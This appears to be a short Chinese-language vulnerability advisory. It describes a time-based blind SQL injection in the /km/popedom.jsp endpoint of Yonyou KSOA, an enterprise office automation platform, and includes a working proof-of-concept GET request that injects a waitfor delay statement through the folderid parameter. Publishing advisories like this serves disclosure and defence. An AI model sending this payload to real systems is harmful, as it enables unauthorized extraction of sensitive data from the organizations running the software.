用友时空KSOA /km/popedom.jsp SQL 注入漏洞

2026-05-09 用友时空KSOA PoC Public

Description

用友时空KSOA(Knowledge System of OA)是用友网络科技股份有限公司推出的大型协同管理平台,是面向集团型企业和政府组织的综合办公自动化系统。该产品采用J2EE架构设计,涵盖知识管理、流程管理、协同办公、信息发布等核心业务模块,支持多组织、多账簿、多币种的复杂业务场景,广泛应用于制造、能源、交通、金融等国民经济重点行业。用友时空KSOA /km/popedom.jsp 接口存在SQL时间盲注漏洞,攻击者可通过 folderid 参数注入恶意 SQL 语句,利用 waitfor delay 命令造成延时响应,从而获取数据库敏感信息。

PoC

GET /km/popedom.jsp?folderid=1'%3Bwaitfor+delay+'0%3a0%3a0'--+ HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities